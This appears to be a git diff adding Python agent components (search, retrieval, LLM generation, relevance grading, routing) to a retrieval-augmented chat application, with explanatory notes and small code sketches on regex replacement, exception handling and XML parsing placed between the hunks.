"doc_aggs": recall_docs
}
if answer.lower().find("invalid key") >= 0 or answer.lower().find("invalid api") >= 0:
answer += " Please set LLM API-Key in 'User Setting -> Model Providers -> API-Key'"
res = {"content": answer, "reference": reference}
return res
def _run(self, history, **kwargs):
chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
prompt = self._param.prompt
retrieval_res = self.get_input()
input = (" - " + "\n - ".join(retrieval_res["content"])) if "content" in retrieval_res else ""
for para in self._param.parameters:
cpn = self._canvas.get_component(para["component_id"])["obj"]
_, out = cpn.output(allow_partial=False)
if "content" not in out.columns:
kwargs[para["key"]] = "Nothing"
else:
kwargs[para["key"]] = " - " + "\n - ".join(out["content"])
kwargs["input"] = input
for n, v in kwargs.items():
# Use a function as the replacement so backslashes in the value are inserted literally.
prompt = re.sub(r"\{%s\}" % re.escape(n), lambda _m, v=v: str(v), prompt)
downstreams = self._canvas.get_component(self._id)["downstream"]
if kwargs.get("stream") and len(downstreams) == 1 and self._canvas.get_component(downstreams[0])[
"obj"].component_name.lower() == "answer":
return partial(self.stream_output, chat_mdl, prompt, retrieval_res)
if "empty_response" in retrieval_res.columns:
return Generate.be_output(input)
ans = chat_mdl.chat(prompt, self._canvas.get_history(self._param.message_history_window_size),
self._param.gen_conf())
if self._param.cite and "content_ltks" in retrieval_res.columns and "vector" in retrieval_res.columns:
df = self.set_cite(retrieval_res, ans)
return pd.DataFrame(df)
return Generate.be_output(ans)
def stream_output(self, chat_mdl, prompt, retrieval_res):
res = None
if "empty_response" in retrieval_res.columns and "\n- ".join(retrieval_res["content"]):
res = {"content": "\n- ".join(retrieval_res["content"]), "reference": []}
yield res
self.set_output(res)
return
answer = ""
for ans in chat_mdl.chat_streamly(prompt, self._canvas.get_history(self._param.message_history_window_size),
self._param.gen_conf()):
res = {"content": ans, "reference": []}
answer = ans
yield res
if self._param.cite and "content_ltks" in retrieval_res.columns and "vector" in retrieval_res.columns:
res = self.set_cite(retrieval_res, answer)
yield res
self.set_output(res)
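
Note on the placeholder substitution in `Generate._run`: when `re.sub` is given a string as the replacement, backslashes in that string are interpreted (for example `\1` as a group reference), so retrieved text containing backslashes can raise an error or be altered. A minimal sketch of literal substitution follows; `fill_prompt` is a hypothetical helper name, not part of the change set.

```python
import re


def fill_prompt(template: str, values: dict) -> str:
    """Replace each {key} placeholder in `template` with str(values[key])."""
    for key, value in values.items():
        pattern = r"\{%s\}" % re.escape(key)
        # A function replacement is inserted as-is, so backslashes in the
        # value are not treated as escapes or group references.
        template = re.sub(pattern, lambda _m, v=value: str(v), template)
    return template


if __name__ == "__main__":
    print(fill_prompt("Context: {input}\nTopic: {topic}",
                      {"input": r"C:\new\1", "topic": "paths"}))
```

Placeholders with no matching key are left untouched, which matches how an unfilled `{key}` would pass through a plain `re.sub` loop.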

96
agent/component/google.py Normal file

@ -0,0 +1,96 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
from serpapi import GoogleSearch
import pandas as pd
from agent.settings import DEBUG
from agent.component.base import ComponentBase, ComponentParamBase
class GoogleParam(ComponentParamBase):
"""
Define the Google component parameters.
"""
def __init__(self):
super().__init__()
self.top_n = 10
self.api_key = "xxx"
self.country = "cn"
self.language = "en"
def check(self):
self.check_positive_integer(self.top_n, "Top N")
self.check_empty(self.api_key, "SerpApi API key")
self.check_valid_value(self.country, "Google Country",
['af', 'al', 'dz', 'as', 'ad', 'ao', 'ai', 'aq', 'ag', 'ar', 'am', 'aw', 'au', 'at',
'az', 'bs', 'bh', 'bd', 'bb', 'by', 'be', 'bz', 'bj', 'bm', 'bt', 'bo', 'ba', 'bw',
'bv', 'br', 'io', 'bn', 'bg', 'bf', 'bi', 'kh', 'cm', 'ca', 'cv', 'ky', 'cf', 'td',
'cl', 'cn', 'cx', 'cc', 'co', 'km', 'cg', 'cd', 'ck', 'cr', 'ci', 'hr', 'cu', 'cy',
'cz', 'dk', 'dj', 'dm', 'do', 'ec', 'eg', 'sv', 'gq', 'er', 'ee', 'et', 'fk', 'fo',
'fj', 'fi', 'fr', 'gf', 'pf', 'tf', 'ga', 'gm', 'ge', 'de', 'gh', 'gi', 'gr', 'gl',
'gd', 'gp', 'gu', 'gt', 'gn', 'gw', 'gy', 'ht', 'hm', 'va', 'hn', 'hk', 'hu', 'is',
'in', 'id', 'ir', 'iq', 'ie', 'il', 'it', 'jm', 'jp', 'jo', 'kz', 'ke', 'ki', 'kp',
'kr', 'kw', 'kg', 'la', 'lv', 'lb', 'ls', 'lr', 'ly', 'li', 'lt', 'lu', 'mo', 'mk',
'mg', 'mw', 'my', 'mv', 'ml', 'mt', 'mh', 'mq', 'mr', 'mu', 'yt', 'mx', 'fm', 'md',
'mc', 'mn', 'ms', 'ma', 'mz', 'mm', 'na', 'nr', 'np', 'nl', 'an', 'nc', 'nz', 'ni',
'ne', 'ng', 'nu', 'nf', 'mp', 'no', 'om', 'pk', 'pw', 'ps', 'pa', 'pg', 'py', 'pe',
'ph', 'pn', 'pl', 'pt', 'pr', 'qa', 're', 'ro', 'ru', 'rw', 'sh', 'kn', 'lc', 'pm',
'vc', 'ws', 'sm', 'st', 'sa', 'sn', 'rs', 'sc', 'sl', 'sg', 'sk', 'si', 'sb', 'so',
'za', 'gs', 'es', 'lk', 'sd', 'sr', 'sj', 'sz', 'se', 'ch', 'sy', 'tw', 'tj', 'tz',
'th', 'tl', 'tg', 'tk', 'to', 'tt', 'tn', 'tr', 'tm', 'tc', 'tv', 'ug', 'ua', 'ae',
'uk', 'gb', 'us', 'um', 'uy', 'uz', 'vu', 've', 'vn', 'vg', 'vi', 'wf', 'eh', 'ye',
'zm', 'zw'])
self.check_valid_value(self.language, "Google languages",
['af', 'ak', 'sq', 'ws', 'am', 'ar', 'hy', 'az', 'eu', 'be', 'bem', 'bn', 'bh',
'xx-bork', 'bs', 'br', 'bg', 'bt', 'km', 'ca', 'chr', 'ny', 'zh-cn', 'zh-tw', 'co',
'hr', 'cs', 'da', 'nl', 'xx-elmer', 'en', 'eo', 'et', 'ee', 'fo', 'tl', 'fi', 'fr',
'fy', 'gaa', 'gl', 'ka', 'de', 'el', 'kl', 'gn', 'gu', 'xx-hacker', 'ht', 'ha', 'haw',
'iw', 'hi', 'hu', 'is', 'ig', 'id', 'ia', 'ga', 'it', 'ja', 'jw', 'kn', 'kk', 'rw',
'rn', 'xx-klingon', 'kg', 'ko', 'kri', 'ku', 'ckb', 'ky', 'lo', 'la', 'lv', 'ln', 'lt',
'loz', 'lg', 'ach', 'mk', 'mg', 'ms', 'ml', 'mt', 'mv', 'mi', 'mr', 'mfe', 'mo', 'mn',
'sr-me', 'my', 'ne', 'pcm', 'nso', 'no', 'nn', 'oc', 'or', 'om', 'ps', 'fa',
'xx-pirate', 'pl', 'pt', 'pt-br', 'pt-pt', 'pa', 'qu', 'ro', 'rm', 'nyn', 'ru', 'gd',
'sr', 'sh', 'st', 'tn', 'crs', 'sn', 'sd', 'si', 'sk', 'sl', 'so', 'es', 'es-419', 'su',
'sw', 'sv', 'tg', 'ta', 'tt', 'te', 'th', 'ti', 'to', 'lua', 'tum', 'tr', 'tk', 'tw',
'ug', 'uk', 'ur', 'uz', 'vu', 'vi', 'cy', 'wo', 'xh', 'yi', 'yo', 'zu']
)
class Google(ComponentBase, ABC):
component_name = "Google"
def _run(self, history, **kwargs):
ans = self.get_input()
ans = " - ".join(ans["content"]) if "content" in ans else ""
if not ans:
return Google.be_output("")
try:
client = GoogleSearch(
{"engine": "google", "q": ans, "api_key": self._param.api_key, "gl": self._param.country,
"hl": self._param.language, "num": self._param.top_n})
google_res = [{"content": '<a href="' + i["link"] + '">' + i["title"] + '</a> ' + i["snippet"]} for i in
client.get_dict()["organic_results"]]
except Exception as e:
return Google.be_output("**ERROR**: Invalid or unavailable parameters!")
if not google_res:
return Google.be_output("")
df = pd.DataFrame(google_res)
if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
return df

@ -0,0 +1,70 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import pandas as pd
from agent.settings import DEBUG
from agent.component.base import ComponentBase, ComponentParamBase
from scholarly import scholarly
class GoogleScholarParam(ComponentParamBase):
"""
Define the GoogleScholar component parameters.
"""
def __init__(self):
super().__init__()
self.top_n = 6
self.sort_by = 'relevance'
self.year_low = None
self.year_high = None
self.patents = True
def check(self):
self.check_positive_integer(self.top_n, "Top N")
self.check_valid_value(self.sort_by, "GoogleScholar Sort_by", ['date', 'relevance'])
self.check_boolean(self.patents, "Whether or not to include patents, defaults to True")
class GoogleScholar(ComponentBase, ABC):
component_name = "GoogleScholar"
def _run(self, history, **kwargs):
ans = self.get_input()
ans = " - ".join(ans["content"]) if "content" in ans else ""
if not ans:
return GoogleScholar.be_output("")
scholar_client = scholarly.search_pubs(ans, patents=self._param.patents, year_low=self._param.year_low,
year_high=self._param.year_high, sort_by=self._param.sort_by)
scholar_res = []
for i in range(self._param.top_n):
try:
pub = next(scholar_client)
scholar_res.append({"content": 'Title: ' + pub['bib']['title'] + '\n_Url: <a href="' + pub[
'pub_url'] + '"></a> ' + "\n author: " + ",".join(pub['bib']['author']) + '\n Abstract: ' + pub[
'bib'].get('abstract', 'no abstract')})
except Exception as e:  # also covers StopIteration when the results run out
print("**ERROR** " + str(e))
break
if not scholar_res:
return GoogleScholar.be_output("")
df = pd.DataFrame(scholar_res)
if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
return df
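
Note on collecting the first N results from an iterator: in Python, `except A or B` evaluates the `or` expression first, and since a class is truthy the clause catches only `A`. Catching several types needs a tuple, or a common base class. The sketch below shows one way to take at most `n` items while keeping whatever was collected if the source fails midway; `safe_take` and `flaky` are hypothetical names used only for illustration.

```python
from itertools import islice


def safe_take(results, n):
    """Return up to n items; keep what was collected if the iterator raises."""
    collected = []
    try:
        # islice stops quietly when the iterator is exhausted, so no
        # explicit StopIteration handling is needed.
        for item in islice(results, n):
            collected.append(item)
    except Exception as e:  # a tuple such as (KeyError, ValueError) also works
        print("**ERROR** " + str(e))
    return collected


def flaky():
    """Stand-in for a remote result stream that fails after one item."""
    yield 1
    raise ValueError("boom")


# `A or B` is resolved before `except` sees it, so it is just the first class.
assert (StopIteration or Exception) is StopIteration
```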

@ -0,0 +1,65 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import re
from abc import ABC
from api.db import LLMType
from api.db.services.llm_service import LLMBundle
from agent.component import GenerateParam, Generate
from agent.settings import DEBUG
class KeywordExtractParam(GenerateParam):
"""
Define the KeywordExtract component parameters.
"""
def __init__(self):
super().__init__()
self.top_n = 1
def check(self):
super().check()
self.check_positive_integer(self.top_n, "Top N")
def get_prompt(self):
self.prompt = """
- Role: You're a question analyzer.
- Requirements:
- Summarize the user's question, and give the top %s most important keywords/phrases.
- Use comma as a delimiter to separate keywords/phrases.
- Answer format: (in language of user's question)
- keyword:
""" % self.top_n
return self.prompt
class KeywordExtract(Generate, ABC):
component_name = "KeywordExtract"
def _run(self, history, **kwargs):
q = ""
for r, c in self._canvas.history[::-1]:
if r == "user":
q += c
break
chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
ans = chat_mdl.chat(self._param.get_prompt(), [{"role": "user", "content": q}],
self._param.gen_conf())
ans = re.sub(r".*keyword:", "", ans).strip()
if DEBUG: print(ans, ":::::::::::::::::::::::::::::::::")
return KeywordExtract.be_output(ans)

@ -0,0 +1,53 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import random
from abc import ABC
from functools import partial
from agent.component.base import ComponentBase, ComponentParamBase
class MessageParam(ComponentParamBase):
"""
Define the Message component parameters.
"""
def __init__(self):
super().__init__()
self.messages = []
def check(self):
self.check_empty(self.messages, "[Message]")
return True
class Message(ComponentBase, ABC):
component_name = "Message"
def _run(self, history, **kwargs):
if kwargs.get("stream"):
return partial(self.stream_output)
return Message.be_output(random.choice(self._param.messages))
def stream_output(self):
res = None
if self._param.messages:
res = {"content": random.choice(self._param.messages)}
yield res
self.set_output(res)

65
agent/component/pubmed.py Normal file

@ -0,0 +1,65 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
from Bio import Entrez
import pandas as pd
import xml.etree.ElementTree as ET
from agent.settings import DEBUG
from agent.component.base import ComponentBase, ComponentParamBase
class PubMedParam(ComponentParamBase):
"""
Define the PubMed component parameters.
"""
def __init__(self):
super().__init__()
self.top_n = 5
self.email = "A.N.Other@example.com"
def check(self):
self.check_positive_integer(self.top_n, "Top N")
class PubMed(ComponentBase, ABC):
component_name = "PubMed"
def _run(self, history, **kwargs):
ans = self.get_input()
ans = " - ".join(ans["content"]) if "content" in ans else ""
if not ans:
return PubMed.be_output("")
try:
Entrez.email = self._param.email
pubmedids = Entrez.read(Entrez.esearch(db='pubmed', retmax=self._param.top_n, term=ans))['IdList']
pubmedcnt = ET.fromstring(
Entrez.efetch(db='pubmed', id=",".join(pubmedids), retmode="xml").read().decode("utf-8"))
pubmed_res = [{"content": 'Title:' + child.find("MedlineCitation").find("Article").find(
"ArticleTitle").text + '\nUrl:<a href="https://pubmed.ncbi.nlm.nih.gov/' + child.find(
"MedlineCitation").find("PMID").text + '">' + '</a>\n' + 'Abstract:' + child.find(
"MedlineCitation").find("Article").find("Abstract").find("AbstractText").text} for child in
pubmedcnt.findall("PubmedArticle")]
except Exception as e:
return PubMed.be_output("**ERROR**: " + str(e))
if not pubmed_res:
return PubMed.be_output("")
df = pd.DataFrame(pubmed_res)
if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
return df
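
Note on reading optional XML fields: chained `.find(...).text` calls raise `AttributeError` as soon as one element is missing, for instance a record without an abstract. `Element.findtext` accepts a path and a default, which lets one record degrade gracefully instead of failing the whole batch. The sketch below uses a made-up sample document; only the element names are taken from the code above, and `summarize` is a hypothetical helper.

```python
import xml.etree.ElementTree as ET

# Hypothetical sample data: the second record has no <Abstract>.
SAMPLE = """<PubmedArticleSet>
  <PubmedArticle>
    <MedlineCitation>
      <PMID>123</PMID>
      <Article>
        <ArticleTitle>With abstract</ArticleTitle>
        <Abstract><AbstractText>Some text.</AbstractText></Abstract>
      </Article>
    </MedlineCitation>
  </PubmedArticle>
  <PubmedArticle>
    <MedlineCitation>
      <PMID>456</PMID>
      <Article><ArticleTitle>No abstract</ArticleTitle></Article>
    </MedlineCitation>
  </PubmedArticle>
</PubmedArticleSet>"""


def summarize(xml_text):
    """Extract PMID, title and abstract, tolerating missing elements."""
    root = ET.fromstring(xml_text)
    rows = []
    for art in root.findall("PubmedArticle"):
        base = "MedlineCitation/"
        rows.append({
            "pmid": art.findtext(base + "PMID", default=""),
            "title": art.findtext(base + "Article/ArticleTitle", default=""),
            # The default is returned only when the element is absent.
            "abstract": art.findtext(base + "Article/Abstract/AbstractText",
                                     default="no abstract"),
        })
    return rows
```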

@ -0,0 +1,80 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
from api.db import LLMType
from api.db.services.llm_service import LLMBundle
from agent.component import GenerateParam, Generate
from rag.utils import num_tokens_from_string, encoder
class RelevantParam(GenerateParam):
"""
Define the Relevant component parameters.
"""
def __init__(self):
super().__init__()
self.prompt = ""
self.yes = ""
self.no = ""
def check(self):
super().check()
self.check_empty(self.yes, "[Relevant] 'Yes'")
self.check_empty(self.no, "[Relevant] 'No'")
def get_prompt(self):
self.prompt = """
You are a grader assessing relevance of a retrieved document to a user question.
It does not need to be a stringent test. The goal is to filter out erroneous retrievals.
If the document contains keyword(s) or semantic meaning related to the user question, grade it as relevant.
Give a binary score, 'yes' or 'no', to indicate whether the document is relevant to the question.
No other words needed except 'yes' or 'no'.
"""
return self.prompt
class Relevant(Generate, ABC):
component_name = "Relevant"
def _run(self, history, **kwargs):
q = ""
for r, c in self._canvas.history[::-1]:
if r == "user":
q = c
break
ans = self.get_input()
ans = " - ".join(ans["content"]) if "content" in ans else ""
if not ans:
return Relevant.be_output(self._param.no)
ans = "Documents: \n" + ans
ans = f"Question: {q}\n" + ans
chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
if num_tokens_from_string(ans) >= chat_mdl.max_length - 4:
ans = encoder.decode(encoder.encode(ans)[:chat_mdl.max_length - 4])
ans = chat_mdl.chat(self._param.get_prompt(), [{"role": "user", "content": ans}],
self._param.gen_conf())
print(ans, ":::::::::::::::::::::::::::::::::")
if ans.lower().find("yes") >= 0:
return Relevant.be_output(self._param.yes)
if ans.lower().find("no") >= 0:
return Relevant.be_output(self._param.no)
assert False, f"Relevant component got: {ans}"
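
Note on parsing a yes/no grade: a substring search for "no" also matches inside words such as "know" or "unknown", and "yes" matches inside "eyes". A whole-word check is stricter. The following is a minimal sketch under that assumption; `parse_binary_grade` is a hypothetical helper, and returning `None` for an unclear answer is a design choice of this sketch rather than the behavior of the component above.

```python
import re


def parse_binary_grade(answer: str):
    """Return True for 'yes', False for 'no', None if neither is a whole word."""
    words = re.findall(r"[a-z]+", answer.lower())
    if "yes" in words:
        return True
    if "no" in words:
        return False
    return None
```

A caller could map `True` and `False` to the configured "yes" and "no" branches and decide separately how to treat `None`.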

@ -0,0 +1,88 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import pandas as pd
from api.db import LLMType
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.llm_service import LLMBundle
from api.settings import retrievaler
from agent.component.base import ComponentBase, ComponentParamBase
class RetrievalParam(ComponentParamBase):
"""
Define the Retrieval component parameters.
"""
def __init__(self):
super().__init__()
self.similarity_threshold = 0.2
self.keywords_similarity_weight = 0.5
self.top_n = 8
self.top_k = 1024
self.kb_ids = []
self.rerank_id = ""
self.empty_response = ""
def check(self):
self.check_decimal_float(self.similarity_threshold, "[Retrieval] Similarity threshold")
self.check_decimal_float(self.keywords_similarity_weight, "[Retrieval] Keywords similarity weight")
self.check_positive_number(self.top_n, "[Retrieval] Top N")
self.check_empty(self.kb_ids, "[Retrieval] Knowledge bases")
class Retrieval(ComponentBase, ABC):
component_name = "Retrieval"
def _run(self, history, **kwargs):
query = []
for role, cnt in history[::-1][:self._param.message_history_window_size]:
if role != "user":continue
query.append(cnt)
query = "\n".join(query)
kbs = KnowledgebaseService.get_by_ids(self._param.kb_ids)
if not kbs:
raise ValueError("Can't find knowledgebases by {}".format(self._param.kb_ids))
embd_nms = list(set([kb.embd_id for kb in kbs]))
assert len(embd_nms) == 1, "Knowledge bases use different embedding models."
embd_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.EMBEDDING, embd_nms[0])
self._canvas.set_embedding_model(embd_nms[0])
rerank_mdl = None
if self._param.rerank_id:
rerank_mdl = LLMBundle(kbs[0].tenant_id, LLMType.RERANK, self._param.rerank_id)
kbinfos = retrievaler.retrieval(query, embd_mdl, kbs[0].tenant_id, self._param.kb_ids,
1, self._param.top_n,
self._param.similarity_threshold, 1 - self._param.keywords_similarity_weight,
aggs=False, rerank_mdl=rerank_mdl)
if not kbinfos["chunks"]:
df = Retrieval.be_output(self._param.empty_response)
df["empty_response"] = True
return df
df = pd.DataFrame(kbinfos["chunks"])
df["content"] = df["content_with_weight"]
del df["content_with_weight"]
print(">>>>>>>>>>>>>>>>>>>>>>>>>>\n", query, df)
return df
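
Note on how the retrieval query is assembled: the history is reversed, cut to the window size, and only user turns are kept, so the newest user message comes first and assistant turns still count toward the window. A minimal sketch of that logic, assuming history is a list of `(role, content)` pairs; `build_query` is a hypothetical name.

```python
def build_query(history, window):
    """Join the user messages found in the last `window` turns, newest first."""
    recent = history[::-1][:window]
    return "\n".join(content for role, content in recent if role == "user")


if __name__ == "__main__":
    turns = [("user", "a"), ("assistant", "b"), ("user", "c")]
    print(build_query(turns, 3))
```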

@ -0,0 +1,72 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
from api.db import LLMType
from api.db.services.llm_service import LLMBundle
from agent.component import GenerateParam, Generate
class RewriteQuestionParam(GenerateParam):
"""
Define the RewriteQuestion component parameters.
"""
def __init__(self):
super().__init__()
self.temperature = 0.9
self.prompt = ""
self.loop = 1
def check(self):
super().check()
def get_prompt(self):
self.prompt = """
You are an expert at query expansion to generate a paraphrasing of a question.
I can't retrieve relevant information from the knowledge base by using the user's question directly.
You need to expand or paraphrase the user's question in multiple ways, such as using synonymous words/phrases,
writing abbreviations out in full, adding some extra descriptions or explanations,
changing the way of expression, translating the original question into another language (English/Chinese), etc.
Return 5 versions of the question, one of which is a translation.
Just list the questions. No other words are needed.
"""
return self.prompt
class RewriteQuestion(Generate, ABC):
component_name = "RewriteQuestion"
def _run(self, history, **kwargs):
if not hasattr(self, "_loop"):
setattr(self, "_loop", 0)
if self._loop >= self._param.loop:
self._loop = 0
raise Exception("Maximum loop count exceeded. Can't find relevant information.")
self._loop += 1
q = "Question: "
for r, c in self._canvas.history[::-1]:
if r == "user":
q += c
break
chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
ans = chat_mdl.chat(self._param.get_prompt(), [{"role": "user", "content": q}],
self._param.gen_conf())
print(ans, ":::::::::::::::::::::::::::::::::")
return RewriteQuestion.be_output(ans)

77
agent/component/switch.py Normal file

@ -0,0 +1,77 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import pandas as pd
from agent.component.base import ComponentBase, ComponentParamBase
class SwitchParam(ComponentParamBase):
"""
Define the Switch component parameters.
"""
def __init__(self):
super().__init__()
"""
{
"cpn_id": "categorize:0",
"not": False,
"operator": "gt/gte/lt/lte/eq/in",
"value": "",
"to": ""
}
"""
self.conditions = []
self.default = ""
def check(self):
self.check_empty(self.conditions, "[Switch] conditions")
self.check_empty(self.default, "[Switch] Default path")
for cond in self.conditions:
if not cond["to"]: raise ValueError("[Switch] 'To' cannot be empty!")
def operators(self, field, op, value):
if op == "gt":
return float(field) > float(value)
if op == "gte":
return float(field) >= float(value)
if op == "lt":
return float(field) < float(value)
if op == "lte":
return float(field) <= float(value)
if op == "eq":
return str(field) == str(value)
if op == "in":
return str(field).find(str(value)) >= 0
return False
class Switch(ComponentBase, ABC):
component_name = "Switch"
def _run(self, history, **kwargs):
for cond in self._param.conditions:
input = self._canvas.get_component(cond["cpn_id"])["obj"].output()[1]
# A condition holds when the operator result differs from its "not" flag.
matched = self._param.operators(input.iloc[0, 0], cond["operator"], cond["value"])
if matched != bool(cond["not"]):
return pd.DataFrame([{"content": cond["to"]}])
return pd.DataFrame([{"content": self._param.default}])
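
Note on routing with a negation flag: the condition schema carries an operator, a value, a `not` flag and a target. One way to combine them is to treat a condition as satisfied when the operator result differs from the flag. The sketch below is standalone and makes assumptions: `outputs` is a hypothetical dict mapping a component id to its first output value, and `evaluate` and `route` are illustrative names.

```python
def evaluate(field, op, value):
    """Apply one of the six operators named in the condition schema."""
    if op in ("gt", "gte", "lt", "lte"):
        a, b = float(field), float(value)
        return {"gt": a > b, "gte": a >= b, "lt": a < b, "lte": a <= b}[op]
    if op == "eq":
        return str(field) == str(value)
    if op == "in":
        return str(value) in str(field)
    return False


def route(conditions, outputs, default):
    """Return the 'to' of the first satisfied condition, else `default`."""
    for cond in conditions:
        result = evaluate(outputs[cond["cpn_id"]], cond["operator"], cond["value"])
        # With "not" set, the condition is satisfied when the test fails.
        if result != bool(cond.get("not", False)):
            return cond["to"]
    return default
```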

@ -0,0 +1,69 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import random
from abc import ABC
from functools import partial
import wikipedia
import pandas as pd
from agent.settings import DEBUG
from agent.component.base import ComponentBase, ComponentParamBase
class WikipediaParam(ComponentParamBase):
"""
Define the Wikipedia component parameters.
"""
def __init__(self):
super().__init__()
self.top_n = 10
self.language = "en"
def check(self):
self.check_positive_integer(self.top_n, "Top N")
self.check_valid_value(self.language, "Wikipedia languages",
['af', 'pl', 'ar', 'ast', 'az', 'bg', 'nan', 'bn', 'be', 'ca', 'cs', 'cy', 'da', 'de',
'et', 'el', 'en', 'es', 'eo', 'eu', 'fa', 'fr', 'gl', 'ko', 'hy', 'hi', 'hr', 'id',
'it', 'he', 'ka', 'lld', 'la', 'lv', 'lt', 'hu', 'mk', 'arz', 'ms', 'min', 'my', 'nl',
'ja', 'nb', 'nn', 'ce', 'uz', 'pt', 'kk', 'ro', 'ru', 'ceb', 'sk', 'sl', 'sr', 'sh',
'fi', 'sv', 'ta', 'tt', 'th', 'tg', 'azb', 'tr', 'uk', 'ur', 'vi', 'war', 'zh', 'yue'])
class Wikipedia(ComponentBase, ABC):
component_name = "Wikipedia"
def _run(self, history, **kwargs):
ans = self.get_input()
ans = " - ".join(ans["content"]) if "content" in ans else ""
if not ans:
return Wikipedia.be_output("")
try:
wiki_res = []
wikipedia.set_lang(self._param.language)
wiki_engine = wikipedia
for wiki_key in wiki_engine.search(ans, results=self._param.top_n):
page = wiki_engine.page(title=wiki_key, auto_suggest=False)
wiki_res.append({"content": '<a href="' + page.url + '">' + page.title + '</a> ' + page.summary})
except Exception as e:
return Wikipedia.be_output("**ERROR**: " + str(e))
if not wiki_res:
return Wikipedia.be_output("")
df = pd.DataFrame(wiki_res)
if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
return df

34
agent/settings.py Normal file

@ -0,0 +1,34 @@
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
